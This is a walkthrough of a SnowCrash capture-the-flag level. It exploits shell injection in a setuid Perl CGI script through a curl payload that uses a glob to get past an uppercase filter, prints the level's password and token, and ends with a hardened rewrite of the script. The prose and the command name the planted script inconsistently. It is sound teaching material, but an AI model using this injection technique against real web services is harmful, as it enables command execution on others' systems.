# Level 12

## how to login

username: level12
password: fa6v5ateaw21peobuub8ipe6s

## Goal

run `getflag` as user `flag12`

## Actually doing something

```bash
level12@SnowCrash:~$ ll
total 16
dr-xr-x---+ 1 level12 level12  120 Mar  5  2016 ./
d--x--x--x  1 root    users    340 Aug 30  2015 ../
-r-x------  1 level12 level12  220 Apr  3  2012 .bash_logout*
-r-x------  1 level12 level12 3518 Aug 30  2015 .bashrc*
-rwsr-sr-x+ 1 flag12  level12  464 Mar  5  2016 level12.pl*
-r-x------  1 level12 level12  675 Apr  3  2012 .profile*
```

Perl again...

```perl
level12@SnowCrash:~$ cat level12.pl
#!/usr/bin/env perl
# localhost:4646

use CGI qw{param};

print "Content-type: text/html\n\n";

sub t {
  $nn = $_[1];
  $xx = $_[0];
  $xx =~ tr/a-z/A-Z/;
  $xx =~ s/\s.*//;
  @output = `egrep "^$xx" /tmp/xd 2>&1`;
  foreach $line (@output) {
      ($f, $s) = split(/:/, $line);
      if($s =~ $nn) {
          return 1;
      }
  }
  return 0;
}

sub n {
  if($_[0] == 1) {
      print("..");
  } else {
      print(".");
  }
}

n(t(param("x"), param("y")));
```

A bit more involved; let's try to make it prettier by renaming the variables:

```perl
#!/usr/bin/env perl
# localhost:4646

use CGI qw{param};

print "Content-type: text/html\n\n";

sub t {
  $arg2 = $_[1];
  $arg1 = $_[0];
  $arg1 =~ tr/a-z/A-Z/;
  $arg1 =~ s/\s.*//;
  @output = `egrep "^$arg1" /tmp/xd 2>&1`;
  foreach $line (@output) {
      ($f, $s) = split(/:/, $line);
      if($s =~ $arg2) {
          return 1;
      }
  }
  return 0;
}

sub n {
  if($_[0] == 1) {
      print("..");
  } else {
      print(".");
  }
}

n(t(param("x"), param("y")));
```

Looking at this, we immediately spot an `egrep` run through backticks with user input interpolated into the command string, meaning we have a shell injection.
Let's first look at what is passed into this string. The script is called with two arguments; let's call them by their HTTP parameter names, `x` and `y`. In the script they are also named `arg1` (for `x`) and `arg2` (for `y`).

`arg2` doesn't matter for us, so let's ignore it.

`arg1` is converted to uppercase, and then only everything up to the first whitespace is kept. So, as last time, we want to insert something that ends the current command and starts ours: `";cmdhere`. The issue is that our command has to be in uppercase (because everything gets converted to uppercase), while the only directory we can write to is `/tmp`, which is lowercase... But this doesn't matter since we are in shell land: a glob such as `/*/GETOK` also refers to the `/tmp/GETOK` script.

```bash
level12@SnowCrash:~$ curl "localhost:4646?y=%22%3B/*/GETTOK%3B%22" && cat /tmp/flag
..Check flag.Here is your token : g1qKMiRpXf53AWhDaU7FEkczr
```
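For contrast, here is how the same lookup can be written without the shell. This is an added example, not part of the challenge or of the original writeup: it keeps the file path `/tmp/xd`, the `x`/`y` parameters and the `t`/`n` names from the script above, and everything else (the allowlist, the literal comparison of the second field) is an assumed hardening choice.

```perl
#!/usr/bin/env perl
# Hardened rewrite of the lookup in level12.pl (added example, not the
# challenge's own code). /tmp/xd and the parameter names x and y come from
# the original script; the allowlist and literal matching are assumptions.
use strict;
use warnings;
use CGI qw{param};

print "Content-type: text/html\n\n";

# Return 1 if some line of $file has a first field starting with $key and
# a second field equal to $value, else 0. No shell is involved.
sub t {
    my ($key, $value, $file) = @_;
    $file //= '/tmp/xd';

    # Allowlist instead of "uppercase, then cut at the first space": a key
    # containing anything but [A-Za-z0-9_] is rejected outright, so quotes,
    # semicolons and globs such as /*/ never reach any command.
    return 0 unless defined $key && $key =~ /\A[A-Za-z0-9_]{1,64}\z/;
    $key = uc $key;

    # Do the matching in Perl rather than via `egrep ...` in backticks.
    open my $fh, '<', $file or return 0;
    while (my $line = <$fh>) {
        chomp $line;
        my ($f, $s) = split /:/, $line, 2;
        next unless defined $f && defined $s;
        # index() gives a literal prefix test; eq gives a literal value test,
        # so $value is never interpreted as a regular expression either.
        next unless index($f, $key) == 0;
        if (defined $value && $s eq $value) {
            close $fh;
            return 1;
        }
    }
    close $fh;
    return 0;
}

sub n { print($_[0] == 1 ? ".." : "."); }

n(t(param("x"), param("y")));
```

Two behaviours change on purpose compared with the original: the first parameter is validated against an allowlist instead of being mangled and passed to a shell, and the second parameter is compared with `eq` instead of being used as the right-hand side of `=~`, which in the original let `y` act as an arbitrary regular expression against the file contents.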